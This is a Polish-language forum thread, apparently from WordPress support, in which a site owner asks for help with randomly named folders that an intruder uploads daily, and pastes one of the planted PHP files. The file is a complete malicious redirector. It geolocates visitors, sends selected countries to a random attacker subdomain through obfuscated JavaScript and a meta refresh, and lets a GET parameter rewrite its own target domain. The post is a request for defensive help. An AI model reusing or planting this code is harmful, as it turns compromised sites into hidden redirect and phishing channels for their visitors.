Haker wgrywa folder z plikami do katalogu głównego
-
Witam
Usuwam foldery a on codziennie wgrywa. Foldery mają losowe nazwy i pliki chyba też. Są tam pliki .dat, .inc, png i .php
Wkleję php<?php /*domain mail.com domain*/ include_once 'Ih0Ak2KYvbdt.inc'; $white_countries = array('SE', 'FI', 'BG'); $sd_param = "ehohog43"; if ((isset($_GET['action'])) && ($_GET['action'] == 'unsubscribe')) { echo "unsubscribed"; exit(0); } if ((isset($_GET['id'])) && (!empty($_GET['id']))) $enc_id = @base64_encode($_GET['id']); else $enc_id = ''; $red_host = "mail.com"; if ((isset($_GET[$sd_param])) && (!empty($_GET[$sd_param]))) { $self = __FILE__; $script = file_get_contents($self); if (preg_match("/\/\*domain(.*)domain\*\//s", $script, $matches)) { $old_domain = trim($matches[1]); $script = preg_replace("/".preg_quote($old_domain)."/im", $_GET[$sd_param], $script); file_put_contents($self, $script); exit("OK"); } } $fake_script = gen_rnd_str(4, 8).".php"; $subdomain = gen_rnd_str(3, 4); $full_url = "http://$subdomain.$red_host/$fake_script?id=$enc_id"; $ip = get_ip(); $country = get_country($ip); if (in_array($country, $white_countries) === false) $full_url = "http://google.com/"; function gen_rnd_str($min, $max) { $only_alphabet = 'abcdefghijklmnopqrstuvwxyz'; $characters = '0123456789abcdefghijklmnopqrstuvwxyz'; $randstring = ''; $len = rand($min, $max); $randstring = $only_alphabet[rand(0, strlen($only_alphabet) - 1)]; for ($i = 1; $i < $len; $i++) $randstring .= $characters[rand(0, strlen($characters) - 1)]; return $randstring; } function get_ip() { if (isset($_SERVER["HTTP_X_REAL_IP"])) $ip = $_SERVER["HTTP_X_REAL_IP"]; elseif (isset($_SERVER["HTTP_X_FORWARDED_FOR"])) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"]; else $ip = $_SERVER['REMOTE_ADDR']; return $ip; } function get_country($ip) { $gi = geoip_open("GkUWjDl0hbp.dat", GEOIP_STANDARD); if ($gi) { $country = geoip_country_code_by_addr($gi, $ip); geoip_close($gi); if (!$country) $country = "NA"; return $country; } return false; } ?> <DOCTYPE html PUBLIC "-//W3C//DTDXHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html;charset=utf-8"/> <noscript> <meta http-equiv="refresh" content="0; url=<?php echo $full_url; ?>"/> </noscript> <title><?php echo gen_rnd_str(4, 8); ?></title> </head> <body> <script language="JavaScript" type="text/javascript"> var _0x9129=["<?php echo $full_url; ?>","\x72\x65\x70\x6C\x61\x63\x65","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];window[_0x9129[2]][_0x9129[1]](_0x9129[0]); </script> </body> </html>
Viewing 1 replies (of 1 total)
Viewing 1 replies (of 1 total)
- Temat ‘Haker wgrywa folder z plikami do katalogu głównego’ jest zamknięty na nowe odpowiedzi.